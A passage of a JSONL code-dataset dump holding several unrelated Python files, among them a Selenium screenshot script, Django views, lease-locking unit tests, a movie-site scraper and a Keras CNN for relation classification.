key\n\t\tquery_list.append(\"%s%s\" % (qtag, value))\n\treturn \" \".join(query_list)\n\nallowed_filters = ('status', 'hood', 'community', 'user.nickname', 'hardware.name', 'software.firmware', 'netifs.mac', 'netmon_id', 'hostname')\ndef parse_router_list_search_query(args):\n\tquery_usr = bson.SON()\n\tif \"q\" in args:\n\t\tfor word in args[\"q\"].strip().split(\" \"):\n\t\t\tif not ':' in word:\n\t\t\t\tkey = \"hostname\"\n\t\t\t\tvalue = word\n\t\t\telse:\n\t\t\t\tkey, value = word.split(':', 1)\n\t\t\tif key in allowed_filters:\n\t\t\t\tquery_usr[key] = query_usr.get(key, \"\") + value\n\tquery = {}\n\tfor key, value in query_usr.items():\n\t\tif value == \"EXISTS\":\n\t\t\tquery[key] = {\"$exists\": True}\n\t\telif value == \"EXISTS_NOT\":\n\t\t\tquery[key] = {\"$exists\": False}\n\t\telif key == 'netifs.mac':\n\t\t\tquery[key] = value.lower()\n\t\telif key == 'hostname':\n\t\t\tquery[key] = {\"$regex\": value.replace('.', '\\.'), \"$options\": 'i'}\n\t\telif key == 'hardware.name':\n\t\t\tquery[key] = {\"$regex\": value.replace('.', '\\.').replace('_', ' '), \"$options\": 'i'}\n\t\telif key == 'netmon_id':\n\t\t\tquery[key] = int(value)\n\t\telse:\n\t\t\tquery[key] = value\n\treturn (query, format_query(query_usr))\n", "sub_path": "ffmap/web/helpers.py", "file_name": "helpers.py", "file_ext": "py", "file_size_in_byte": 1288, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "bson.SON", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "196578378", "text": "import os\nfrom selenium import webdriver\n\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument('--headless')\nchrome_options.add_argument('--no-sandbox')\nchrome_options.add_argument('--disable-dev-shm-usage')\nchrome_driver = os.path.join('chromedriver')\n\ndriver = webdriver.Chrome(chrome_driver, options=chrome_options)\ndriver.get(\"http://ncov.mohw.go.kr/\")\ndriver.get_screenshot_as_file(\"TEST5.png\")\nelement = driver.find_element_by_class_name(\"ncov_tab_content.on\")\nelement_png = element.screenshot_as_png\nwith open('TEST5.png', \"wb\") as file:\n file.write(element_png)\n\ndriver.quit()\n", "sub_path": "test5.py", "file_name": "test5.py", "file_ext": "py", "file_size_in_byte": 604, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "selenium.webdriver.ChromeOptions", "line_number": 4, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 4, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 10, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "308043962", "text": "from django.shortcuts import render, get_object_or_404, redirect\nfrom .forms import foForm\nfrom .models import fo\ndef index(request):\n form = foForm(request.POST or None)\n if form.is_valid():\n form.save()\n form = foForm()\n context = {\n 'form': form\n }\n return render(request, \"index.html\", context)\ndef show(request):\n name=fo.objects.order_by('title')\n context={\n 'name':name\n }\n return render(request, \"show.html\", context)\n\ndef delete(request, id):\n obj = get_object_or_404(fo, id=id)\n obj.delete()\n name=fo.objects.order_by('title')\n print(name.count())\n context={\n 'name':name\n }\n return render(request, \"show.html\", context)\n", "sub_path": "fo/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 714, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "forms.foForm", "line_number": 5, "usage_type": "call"}, {"api_name": "forms.foForm", "line_number": 8, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 12, "usage_type": "call"}, {"api_name": "models.fo.objects.order_by", "line_number": 14, "usage_type": "call"}, {"api_name": "models.fo.objects", "line_number": 14, "usage_type": "attribute"}, {"api_name": "models.fo", "line_number": 14, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 21, "usage_type": "call"}, {"api_name": "models.fo", "line_number": 21, "usage_type": "argument"}, {"api_name": "models.fo.objects.order_by", "line_number": 23, "usage_type": "call"}, {"api_name": "models.fo.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "models.fo", "line_number": 23, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "361286023", "text": "# -*- coding: utf-8 -*-\nimport configparser\nimport os\nfrom apscheduler.triggers.cron import CronTrigger\nfrom apscheduler.schedulers.blocking import BlockingScheduler\n\nfrom openpyxl import load_workbook\n#数据加载\n# dir_path=os.path.dirname(os.path.dirname(os.path.relpath(__file__)))\n# print(dir_path)\n# config_xlsx_path=os.path.join(dir_path,'config.xlsx')\n# print(config_xlsx_path)\n# wb=load_workbook(config_xlsx_path,data_only=True)\n# wb=load_workbook('../config.xlsx',data_only=True)\n# dir_path=os.path.dirname(os.getcwd())\n# config_xlsx_path = os.path.join(dir_path, r'config.xlsx')\n# wb = load_workbook(config_xlsx_path, data_only=True)\n# sheet=wb['info']\n#\n# # 获取用户名信息\n# row_list=[]\n# pinyin=['yuqingtong_username','yuqingtong_password','dama_username','dama_password','softid','project_name','sheet_name','keywords']\n# for row in sheet.iter_rows(min_row=2,max_col=8):\n# row_info = []\n# for cell in row:\n# row_info.append(cell.value)\n# info = dict(list(zip(pinyin, row_info)))\n# row_list.append(info)\n\n\n# for data in sheet[2:5]:\n# print(type(data))\n# print(data)\n# d=dict(list(zip(pinyin,data)))\n# print(d)\n# print(row_info)\n\n# print(info)\n# USERNAME = info['yuqingtong_username']\n# PASSWORD = info['yuqingtong_password']\n\n\n\n# 获取设置的时间\ndef get_time_list():\n sheet=wb['time']\n time_data_all = sheet.iter_rows(min_row=2)\n times = []\n for row in time_data_all:\n time = {\n 'start_time':'',\n 'end_time':'',\n 'time_delay':'2'\n }\n for cell in row:\n if(cell.column==1):\n time['start_time']=cell.value\n elif(cell.column==2):\n time['end_time']=cell.value\n elif(cell.column==3):\n time['time_delay']=cell.value\n times.append(time)\n return times\n\n# USERNAME = info['yuqingtong_username']\n# PASSWORD = info['yuqingtong_password']\n# 浏览器相关\nHEAD_LESS = False\n\n# 等待时间 秒\nWAIT_TIME = 20\n\n# 时间区间内最大数据量\nMAX_DATA_COUNT = 5000\n\n# 抓取多少页后重启浏览器\nMAX_CRAWL_PAGE_COUNT = 50\n\n# 时间格式format\nDATETIME_FORMAT = \"%Y-%m-%d %H:%M:%S\"\n\nDATA_DIR = \"../data/\"\n\nclass redconfig():\n def __init__(self,filepath=None):\n if filepath:\n self.config_path=filepath\n else:\n self.config_path=os.path.join(os.path.dirname(os.getcwd()), 'config.ini')\n print(self.config_path)\n self.config=configparser.ConfigParser()\n self.config.read(self.config_path,encoding='utf-8')\n\n def getValueByDict(self,key,value):\n return self.config.get(key,value)\n\n def getDictBySection(self,section):\n return dict(self.config.items(section))\n\n\ndef print_it():\n print(\"kkk\")\n\nif __name__ == '__main__':\n myconfig=redconfig()\n # print(myconfig.getValueByDict('yqt_info','username'))\n # print(myconfig.getDictBySection('time_info'))\n # cron_info=myconfig.getDictBySection('cron_info')\n # # for key,value in cron_info.items():\n # # cron_info[key]=eval(value)\n # tigger1=CronTrigger(**cron_info)\n # print(tigger1.fields)\n # scheduler=BlockingScheduler()\n # scheduler.add_job(print_it,tigger1,max_instances=10,id='212')\n # scheduler.start()\n # test1=eval(myconfig.getValueByDict(\"crawl_condition\", \"condition\"))\n # print(type(test1))\n # print(test1)\n # for key,value in test1.items():\n # print(key,value)\n # dir_path = os.path.dirname(os.path.dirname(os.path.relpath(__file__)))\n # dir_path=os.path.dirname(os.getcwd())\n # config_xlsx_path = os.path.join(dir_path, r'config.xlsx')\n # wb = load_workbook(config_xlsx_path, data_only=True)\n\n test1 = eval(myconfig.getValueByDict(\"industry_info\", \"project_name\"))\n print(test1)\n print(type(test1))\n # for i in test1:\n print('优速测试_快消品' in test1)\n\n", "sub_path": "apscheduler_yqt/yuqingtong/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 3893, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.join", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 89, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 89, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 91, "usage_type": "call"}]} +{"seq_id": "417507022", "text": "from concurrent.futures.thread import ThreadPoolExecutor\nimport time\nimport uuid\nimport unittest\n\nfrom anchore_engine.db import db_locks, initialize, session_scope, Lease\nfrom anchore_engine.subsys import logger\nfrom anchore_engine.subsys.logger import enable_bootstrap_logging\n\nenable_bootstrap_logging()\n\nconn_str = 'postgres+pg8000://postgres:postgres@localhost:54320/postgres'\n\n\ndef init():\n config = {\n 'credentials':\n {'database':\n {'db_connect': conn_str}\n }\n }\n initialize(localconfig=config)\n\n\nclass TestLocking(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n init()\n\n def test_serial_lock(self):\n id = uuid.uuid1().hex\n id2 = uuid.uuid1().hex\n lock_id = 'testlock'\n db_locks.init_lease(lock_id)\n\n r = db_locks.acquire_lease(lock_id, id)\n self.assertEqual(r['id'], lock_id)\n\n r2 = db_locks.acquire_lease(lock_id, id2)\n self.assertIsNone(r2, 'Should have failed to get the lock')\n\n self.assertIsNone(db_locks.release_lease(lock_id, id2, r2['epoch']))\n\n r3 = db_locks.acquire_lease(lock_id, id2)\n self.assertEqual(lock_id, r3['id'], 'Failed to get lock after free')\n\n self.assertIsNone(db_locks.release_lease(r['id'], r['held_by'], r['epoch']))\n self.assertIsNone(db_locks.release_lease(r3['id'], r['held_by'], r['epoch']))\n\n def test_expiration(self):\n lock_id = 'test_lock2'\n id = uuid.uuid4().hex\n id2 = uuid.uuid4().hex\n\n db_locks.init_lease(lock_id)\n\n l = db_locks.acquire_lease(lock_id, id, ttl=1)\n self.assertEqual(lock_id, l['id'])\n\n time.sleep(3)\n\n l2 = db_locks.acquire_lease(lock_id, id2, ttl=100)\n self.assertIsNotNone(l2)\n self.assertEqual(lock_id, l2['id'])\n\n self.assertIsNone(db_locks.release_lease(l2['id'], l2['held_by'], l2['epoch']))\n\n def _test_thread_lock(self, t):\n id = uuid.uuid4().hex\n lock_id = 'testlock'\n db_locks.init_lease(lock_id)\n count = 10\n\n r = None\n\n while count > 0:\n inner = 5\n\n while inner > 0:\n r = db_locks.acquire_lease(lock_id, id, ttl=t - 1)\n if not r:\n time.sleep(t)\n inner -= 1\n else:\n break\n\n logger.info('{} Lock: {}'.format(id, r))\n logger.info('Sleeping for {}'.format(t))\n time.sleep(t)\n\n if r:\n db_locks.release_lease(r['id'], r['held_by'], r['epoch'])\n logger.info('{} Lock: {}'.format(id, r))\n\n count -= 1\n\n return 'Complete'\n\n def test_contextmgr(self):\n lockid = 'testlock'\n lockid2= 'test_lock_2'\n db_locks.init_lease(lockid)\n db_locks.init_lease(lockid2)\n with db_locks.least_with_ttl(lockid, 'myid123', ttl=10) as lt:\n print(lt)\n with session_scope() as db:\n print(('{}'.format('\\n'.join([str(x) for x in db.query(Lease).all()]))))\n\n print(lt)\n\n def test_threads(self):\n th = []\n t = ThreadPoolExecutor(max_workers=3)\n th.append(t.submit(self._test_thread_lock, 2))\n th.append(t.submit(self._test_thread_lock, 5))\n th.append(t.submit(self._test_thread_lock, 1))\n\n for thread in th:\n # Wait for completion\n r = thread.result()\n print(('Thread result {}'.format(r)))\n\n\nif __name__ == '__main__':\n unittest.main()\n", "sub_path": "legacy_test/services/common/test_leases.py", "file_name": "test_leases.py", "file_ext": "py", "file_size_in_byte": 3552, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "anchore_engine.subsys.logger.enable_bootstrap_logging", "line_number": 10, "usage_type": "call"}, {"api_name": "anchore_engine.db.initialize", "line_number": 22, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 25, "usage_type": "attribute"}, {"api_name": "uuid.uuid1", "line_number": 31, "usage_type": "call"}, {"api_name": "uuid.uuid1", "line_number": 32, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks.init_lease", "line_number": 34, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 34, "usage_type": "name"}, {"api_name": "anchore_engine.db.db_locks.acquire_lease", "line_number": 36, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 36, "usage_type": "name"}, {"api_name": "anchore_engine.db.db_locks.acquire_lease", "line_number": 39, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 39, "usage_type": "name"}, {"api_name": "anchore_engine.db.db_locks.release_lease", "line_number": 42, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 42, "usage_type": "name"}, {"api_name": "anchore_engine.db.db_locks.acquire_lease", "line_number": 44, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 44, "usage_type": "name"}, {"api_name": "anchore_engine.db.db_locks.release_lease", "line_number": 47, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 47, "usage_type": "name"}, {"api_name": "anchore_engine.db.db_locks.release_lease", "line_number": 48, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 48, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 52, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 53, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks.init_lease", "line_number": 55, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 55, "usage_type": "name"}, {"api_name": "anchore_engine.db.db_locks.acquire_lease", "line_number": 57, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 57, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 60, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks.acquire_lease", "line_number": 62, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 62, "usage_type": "name"}, {"api_name": "anchore_engine.db.db_locks.release_lease", "line_number": 66, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 66, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 69, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks.init_lease", "line_number": 71, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 71, "usage_type": "name"}, {"api_name": "anchore_engine.db.db_locks.acquire_lease", "line_number": 80, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 80, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 82, "usage_type": "call"}, {"api_name": "anchore_engine.subsys.logger.info", "line_number": 87, "usage_type": "call"}, {"api_name": "anchore_engine.subsys.logger", "line_number": 87, "usage_type": "name"}, {"api_name": "anchore_engine.subsys.logger.info", "line_number": 88, "usage_type": "call"}, {"api_name": "anchore_engine.subsys.logger", "line_number": 88, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 89, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks.release_lease", "line_number": 92, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 92, "usage_type": "name"}, {"api_name": "anchore_engine.subsys.logger.info", "line_number": 93, "usage_type": "call"}, {"api_name": "anchore_engine.subsys.logger", "line_number": 93, "usage_type": "name"}, {"api_name": "anchore_engine.db.db_locks.init_lease", "line_number": 102, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 102, "usage_type": "name"}, {"api_name": "anchore_engine.db.db_locks.init_lease", "line_number": 103, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 103, "usage_type": "name"}, {"api_name": "anchore_engine.db.db_locks.least_with_ttl", "line_number": 104, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 104, "usage_type": "name"}, {"api_name": "anchore_engine.db.session_scope", "line_number": 106, "usage_type": "call"}, {"api_name": "anchore_engine.db.Lease", "line_number": 107, "usage_type": "argument"}, {"api_name": "concurrent.futures.thread.ThreadPoolExecutor", "line_number": 113, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 125, "usage_type": "call"}]} +{"seq_id": "585382613", "text": "# 使用BeautifulSoup解析网页\n\nimport requests\nfrom bs4 import BeautifulSoup as bs\n# bs4是第三方库需要使用pip命令安装\nimport requests\nimport lxml.etree\nimport re\nimport pandas as pd\n\nheader={\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'Accept-Encoding':'gzip, deflate, br',\n 'Accept-Language':'zh-CN,zh;q=0.9',\n 'Cache-Control':'max-age=0',\n 'Connection':'keep-alive',\n 'Cookie':'__mta=53834519.1583065701340.1583108060211.1583108060676.20; uuid_n_v=v1; uuid=22053C605BB811EA9F0985C24ED856C3328A984601984D769ABA5F0CB37F9375; _csrf=ea175c7bf99c2857a14ab1f681c5b2ecda89ad7d289d75398ec75e3be3fced4e; Hm_lvt_703e94591e87be68cc8da0da7cbd0be2=1583065701; _lx_utm=utm_source%3DBaidu%26utm_medium%3Dorganic; _lxsdk_cuid=17096119979c8-002e7da7eaa60d-4313f6b-144000-1709611997ac8; mojo-uuid=dd0ebe64e78f7063615ea02b6a1e0aea; __mta=53834519.1583065701340.1583065822531.1583065825533.7; _lxsdk=22053C605BB811EA9F0985C24ED856C3328A984601984D769ABA5F0CB37F9375; Hm_lpvt_703e94591e87be68cc8da0da7cbd0be2=1583108061; _lxsdk_s=17098f889a5-f18-5b8-a84%7C%7C2',\n 'Host':'maoyan.com',\n 'Sec-Fetch-Dest':'document',\n 'Sec-Fetch-Mode':'navigate',\n 'Sec-Fetch-Site':'none',\n 'Sec-Fetch-User':'?1',\n 'Upgrade-Insecure-Requests':'1',\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36',\n }\n\nmyurl = 'https://maoyan.com/board/4'\n\nresponse = requests.get(myurl,headers=header)\nresponse.encoding ='utf-8'\nbs_info = bs(response.text, 'html.parser')\n\n\n# Python 中使用 for in 形式的循环,Python使用缩进来做语句块分隔\nmyList=[]\nfor tags in bs_info.find_all('div', attrs={'class': 'board-item-content'}):\n for atag in tags.find_all('a'):\n #print(atag.get('href'))\n urls ='https://maoyan.com'+str(atag.get('href'))\n #print(urls)\n # 获取所有链接\n\n response1 = requests.get(urls, headers=header)\n bs_info1 = bs(response1.text, 'html.parser')\n kid = bs_info1.find_all('a', attrs={'class':'text-link'})\n movietype = re.findall(u\"[\\u4e00-\\u9fa5]+\",str(kid)) \n # 电影类型\n #print(movietype)\n \n movienames=atag.get('title')\n #print(movienames)\n # 获取电影名字\n releasetimes= tags.find('p', attrs={'class': 'releasetime'},).text \n #print(releasetimes)\n # 获取电影上映时间\n for btag in tags.find_all('div', attrs={'class':'movie-item-number score-num'}):\n #print(btag.find('i', ).text)\n #print(btag.find('i',attrs={'class': 'fraction'}, ).text)\n sore = str(btag.find('i', ).text)+str(btag.find('i',attrs={'class': 'fraction'}, ).text)\n #print(sore)\n myList.append([urls, movienames, releasetimes, sore, movietype])\n\n\nmovie1 = pd.DataFrame(data = myList)\n\n# windows需要使用gbk字符集 \nmovie1.to_csv('./movie2.csv', encoding='gbk', index=False, header=False)\n\n\n", "sub_path": "week01/homework_one.py", "file_name": "homework_one.py", "file_ext": "py", "file_size_in_byte": 3122, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.get", "line_number": 29, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 31, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 43, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 44, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 46, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "263397222", "text": "# coding:utf-8\n\nimport random\nfrom numpy.random import seed\nfrom tensorflow import set_random_seed\n\nseed(1337)\nrandom.seed(1337)\nset_random_seed(1337)\n\nimport numpy as np\nimport tensorflow as tf\n\nimport os\nimport keras\nfrom keras.layers import Dense, Conv1D, Dropout, Input, concatenate, MaxPooling1D, Flatten, LSTM, Bidirectional, \\\n RepeatVector, Reshape, TimeDistributed, Activation, MaxPool1D, Lambda, BatchNormalization\nfrom keras.layers.embeddings import Embedding\nfrom keras.engine.topology import Layer\nfrom keras.layers.merge import concatenate, add, multiply, dot\nfrom keras import Model\nimport sys\n\nsys.path.append(\"..\")\nfrom pretreat.semeval_2010 import EMBEDDING_DIM\nfrom pretreat.semeval_2010 import RELATION_COUNT\n\nfrom keras.optimizers import Adadelta, Adam\nfrom keras.optimizers import sgd\nfrom keras.callbacks import Callback\nfrom keras import regularizers\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\nfrom comm.scorer import get_marco_f1\nfrom keras.metrics import mean_squared_error, categorical_crossentropy, mse, mae\nfrom keras.layers.advanced_activations import LeakyReLU, PReLU\nfrom comm.piecewise_maxpool import piecewise_maxpool_layer\nfrom keras.utils import multi_gpu_model\nfrom comm.marco_f1 import f1\nfrom keras.constraints import max_norm\n\nPOS_EMBEDDING_DIM = 150\nFIXED_SIZE = 100\n\n\nclass f1_calculator(Callback):\n def __init__(self, index, pos1_index, pos2_index, result):\n self.index = index\n self.result = result\n self.pos1_index = pos1_index\n self.pos2_index = pos2_index\n\n def on_epoch_end(self, epoch, logs=None):\n logs = logs or {}\n predict_result = self.model.predict(x=[self.index, self.pos1_index, self.pos2_index, ])\n f1_score = get_marco_f1(predict_result, self.result)\n self.save_best(f1_score)\n logs[\"f1_score\"] = f1_score\n\n def save_best(self, f1):\n with open(\"/home/zy/git/zy_paper/cnn/simple_best/README\", \"r\") as file:\n best_f1 = file.readline()\n best_f1 = float(best_f1)\n if f1 > best_f1:\n os.system(\"rm /home/zy/git/zy_paper/cnn/simple_best/README\")\n with open(\"/home/zy/git/zy_paper/cnn/simple_best/README\", \"w\") as file:\n file.write(str(f1))\n self.model.save(\"/home/zy/git/zy_paper/cnn/simple_best/simple_cnn.model\")\n\n\nif __name__ == \"__main__\":\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\n os.chdir(\"/home/zy/data/zy_paper/google\")\n train_relative_e1_pos = np.load(\"train_relative_e1_pos_without_indicator.npy\")\n train_relative_e2_pos = np.load(\"train_relative_e2_pos_without_indicator.npy\")\n test_relative_e1_pos = np.load(\"test_relative_e1_pos_without_indicator.npy\")\n test_relative_e2_pos = np.load(\"test_relative_e2_pos_without_indicator.npy\")\n train_labels = np.load(\"train_labels.npy\")\n test_labels = np.load(\"test_labels.npy\")\n # train_e1_pos = np.load(\"train_e1_pos_without_indicator.npy\")\n # train_e2_pos = np.load(\"train_e2_pos_without_indicator.npy\")\n # test_e1_pos = np.load(\"test_e1_pos_without_indicator.npy\")\n # test_e2_pos = np.load(\"test_e2_pos_without_indicator.npy\")\n vec = np.load(\"google_vec.npy\")\n train_index = np.load(\"train_google_without_indicator_index.npy\")\n test_index = np.load(\"test_google_without_indicator_index.npy\")\n\n train_sent = np.load(\"/home/zy/data/zy_paper/bert_large/train.npy\")\n test_sent = np.load(\"/home/zy/data/zy_paper/bert_large/test.npy\")\n\n # index_input = Input(shape=(FIXED_SIZE,), dtype=\"int32\")\n\n sentence_input = Input(shape=(FIXED_SIZE, 1024), dtype=\"float32\")\n\n pos1_input = Input(shape=(FIXED_SIZE,), dtype=\"int32\")\n pos2_input = Input(shape=(FIXED_SIZE,), dtype=\"int32\")\n\n # e1_pos = Input(shape=(1,), dtype=\"int32\")\n # e2_pos = Input(shape=(1,), dtype=\"int32\")\n\n pos1_embedding = Embedding(input_dim=2 * FIXED_SIZE - 1, output_dim=POS_EMBEDDING_DIM, input_length=FIXED_SIZE,\n trainable=True) \\\n (pos1_input)\n\n pos2_embedding = Embedding(input_dim=2 * FIXED_SIZE - 1, output_dim=POS_EMBEDDING_DIM, input_length=FIXED_SIZE,\n trainable=True) \\\n (pos2_input)\n\n pos_embedding = concatenate([pos1_embedding, pos2_embedding], axis=2)\n\n word_embedding = sentence_input\n # word_embedding = Embedding(input_dim=len(vec), output_dim=EMBEDDING_DIM, weights=[vec], input_length=FIXED_SIZE,\n # trainable=True)(index_input)\n\n embedding_output = concatenate([word_embedding, pos_embedding], axis=2)\n # embedding_output = add([word_embedding, pos_embedding])\n\n cnn1 = Conv1D(filters=250, kernel_size=2, strides=1, padding=\"same\", activation=\"tanh\")(embedding_output)\n cnn2 = Conv1D(filters=250, kernel_size=3, strides=1, padding=\"same\", activation=\"tanh\")(embedding_output)\n cnn3 = Conv1D(filters=250, kernel_size=4, strides=1, padding=\"same\", activation=\"tanh\")(embedding_output)\n cnn4 = Conv1D(filters=250, kernel_size=5, strides=1, padding=\"same\", activation=\"tanh\")(embedding_output)\n\n cnn_output = concatenate([cnn1, cnn2, cnn3, cnn4], axis=2)\n\n cnn_output = MaxPooling1D(pool_size=FIXED_SIZE, strides=FIXED_SIZE, padding=\"valid\")(cnn_output)\n\n # cnn_output = BatchNormalization()(cnn_output)\n\n cnn_output = Lambda(lambda x: tf.squeeze(x, axis=1))(cnn_output)\n # cnn1 = piecewise_maxpool_layer(filter_num=128, fixed_size=FIXED_SIZE)([cnn1, e1_pos, e2_pos])\n # cnn2 = piecewise_maxpool_layer(filter_num=128, fixed_size=FIXED_SIZE)([cnn2, e1_pos, e2_pos])\n # cnn3 = piecewise_maxpool_layer(filter_num=128, fixed_size=FIXED_SIZE)([cnn3, e1_pos, e2_pos])\n # cnn4 = piecewise_maxpool_layer(filter_num=128, fixed_size=FIXED_SIZE)([cnn4, e1_pos, e2_pos])\n #\n # cnn1 = MaxPooling1D(pool_size=FIXED_SIZE, strides=1, padding=\"same\")(cnn1)\n # cnn2 = MaxPooling1D(pool_size=FIXED_SIZE, strides=1, padding=\"same\")(cnn2)\n # cnn3 = MaxPooling1D(pool_size=FIXED_SIZE, strides=1, padding=\"same\")(cnn3)\n # cnn4 = MaxPooling1D(pool_size=FIXED_SIZE, strides=1, padding=\"same\")(cnn4)\n\n # cnn_output = concatenate([cnn1, cnn2, cnn3, cnn4], axis=1)\n\n # output = Flatten()(cnn_output)\n\n output = Dropout(rate=0.3)(cnn_output)\n\n # output = Dense(128, activation=\"tanh\")(output)\n\n output = Dense(RELATION_COUNT, activation=\"softmax\", kernel_regularizer=keras.regularizers.l2(0.01),\n bias_regularizer=keras.regularizers.l2(0.01))(output)\n\n model = Model(inputs=[sentence_input, pos1_input, pos2_input], outputs=[output])\n\n # model = multi_gpu_model(model, gpus=4)\n\n optimizer = Adam()\n\n model.compile(optimizer=optimizer, loss=\"categorical_crossentropy\", metrics=[\"accuracy\"])\n\n model.fit(x=[train_sent, train_relative_e1_pos, train_relative_e2_pos],\n y=[train_labels],\n validation_data=(\n [test_sent, test_relative_e1_pos, test_relative_e2_pos], [test_labels]),\n batch_size=125,\n epochs=100,\n callbacks=[f1_calculator(test_sent, test_relative_e1_pos, test_relative_e2_pos,\n test_labels),\n ModelCheckpoint(\"simple_cnn.model\", \"f1_score\", 0, True, False, \"max\"),\n EarlyStopping(\"f1_score\", 0.000001, 20, 0, \"max\")\n ]\n )\n", "sub_path": "cnn/cnn_bert.py", "file_name": "cnn_bert.py", "file_ext": "py", "file_size_in_byte": 7360, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.random.seed", "line_number": 7, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 8, "usage_type": "call"}, {"api_name": "tensorflow.set_random_seed", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 24, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "keras.callbacks.Callback", "line_number": 45, "usage_type": "name"}, {"api_name": "comm.scorer.get_marco_f1", "line_number": 55, "usage_type": "call"}, {"api_name": "comm.marco_f1.f1", "line_number": 63, "usage_type": "name"}, {"api_name": "os.system", "line_number": 64, "usage_type": "call"}, {"api_name": "comm.marco_f1.f1", "line_number": 66, "usage_type": "argument"}, {"api_name": "os.environ", "line_number": 71, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 88, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 92, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 94, "usage_type": "call"}, 